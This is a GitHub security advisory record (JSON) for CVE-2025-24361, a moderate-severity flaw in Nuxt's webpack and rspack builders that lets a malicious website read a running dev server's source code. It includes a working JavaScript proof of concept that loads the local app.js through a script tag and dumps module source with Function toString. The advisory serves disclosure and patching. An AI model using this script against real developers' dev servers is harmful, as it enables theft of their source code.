{"id":"GHSA-4gf7-ff8x-hq99","summary":"Opening a malicious website while running a Nuxt dev server could allow read-only access to code","details":"### Summary\nSource code may be stolen during dev when using webpack / rspack builder and you open a malicious web site.\n\n### Details\nBecause the request for classic script by a script tag is not subject to same origin policy, an attacker can inject `\u003cscript src=\"http://localhost:3000/_nuxt/app.js\"\u003e` in their site and run the script.\nBy using `Function::toString` against the values in `window.webpackChunknuxt_app`, the attacker can get the source code.\n\n### PoC\n1. Create a nuxt project with webpack / rspack builder.\n1. Run `npm run dev`\n1. Open `http://localhost:3000`\n1. Run the script below in a web site that has a different origin.\n1. You can see the source code output in the document and the devtools console.\n\n```js\nconst script = document.createElement('script')\nscript.src = 'http://localhost:3000/_nuxt/app.js'\nscript.addEventListener('load', () =\u003e {\n  for (const page in window.webpackChunknuxt_app) {\n    const moduleList = window.webpackChunknuxt_app[page][1]\n    console.log(moduleList)\n\n    for (const key in moduleList) {\n      const p = document.createElement('p')\n      const title = document.createElement('strong')\n      title.textContent = key\n      const code = document.createElement('code')\n      code.textContent = moduleList[key].toString()\n      p.append(title, ':', document.createElement('br'), code)\n      document.body.appendChild(p)\n    }\n  }\n})\ndocument.head.appendChild(script)\n```\n\n![image](https://github.com/user-attachments/assets/201e39b7-da5c-4359-867f-96c9adfd3c85)\nIt contains the compiled source code and also the source map (but it seems the sourcemap contains transformed content in the `sourcesContent` field).\n\n### Impact\nUsers using webpack / rspack builder may get the source code stolen by malicious websites.\n","aliases":["CVE-2025-24361"],"modified":"2025-01-30T03:05:05Z","published":"2025-01-27T11:31:41Z","database_specific":{"github_reviewed":true,"github_reviewed_at":"2025-01-27T11:31:41Z","severity":"MODERATE","cwe_ids":["CWE-749"],"nvd_published_at":"2025-01-25T01:15:24Z"},"references":[{"type":"WEB","url":"https://github.com/nuxt/nuxt/security/advisories/GHSA-4gf7-ff8x-hq99"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2025-24361"},{"type":"WEB","url":"https://github.com/nuxt/nuxt/commit/7eeb910bf4accb1e0193b9178c746f06ad3dd88f"},{"type":"PACKAGE","url":"https://github.com/nuxt/nuxt"}],"affected":[{"package":{"name":"@nuxt/webpack-builder","ecosystem":"npm","purl":"pkg:npm/%40nuxt/webpack-builder"},"ranges":[{"type":"SEMVER","events":[{"introduced":"3.0.0"},{"fixed":"3.15.3"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/01/GHSA-4gf7-ff8x-hq99/GHSA-4gf7-ff8x-hq99.json"}},{"package":{"name":"@nuxt/rspack-builder","ecosystem":"npm","purl":"pkg:npm/%40nuxt/rspack-builder"},"ranges":[{"type":"SEMVER","events":[{"introduced":"3.12.2"},{"fixed":"3.15.3"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/01/GHSA-4gf7-ff8x-hq99/GHSA-4gf7-ff8x-hq99.json"}}],"schema_version":"1.7.3","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"}]}